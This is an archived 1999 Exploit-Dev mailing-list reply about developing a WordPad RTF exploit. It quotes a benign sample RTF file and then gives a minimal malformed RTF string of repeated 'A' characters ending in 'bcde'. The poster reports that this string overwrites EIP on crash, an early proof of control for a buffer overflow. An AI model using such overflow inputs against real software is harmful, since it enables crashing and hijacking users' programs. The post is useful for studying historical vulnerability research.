OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Exploit-Dev Archives: Re: development of wordpad exploit

Re: development of wordpad exploit


Dave Harvill (dlhACU.CS.UMB.EDU)
Sun, 21 Nov 1999 00:07:54 -0500


On Sat, 20 Nov 1999, Thomas Dullien wrote:

<snip>
>
> For this reason, we first use wordpad to create a simple rtf file, containing any
> text you wish. Mine looks like this when viewed in notepad:
>
> ;--- snip ;>----------
> {\rtf1\ansi\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}}
> {\colortbl\red0\green0\blue0;}
> \deflang1031\pard\plain\f2\fs20 HOLA :)
> \par }
> ;--- snap ;>-----------
</snip>

if you're looking for simplicity, I managed with the following:

{rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbcde}

and got 0x45444342 in EIP after crash. Found this to be minimum to get
bcde in EIP

-dave

~~~~~~~~~~~~~~~~~~~~~~
dlhacu.cs.umb.edu
http://www.cs.umb.edu
~~~~~~~~~~~~~~~~~~~~~~



This archive was generated by hypermail 2.0b3 on Sun Nov 21 1999 - 01:14:19 CST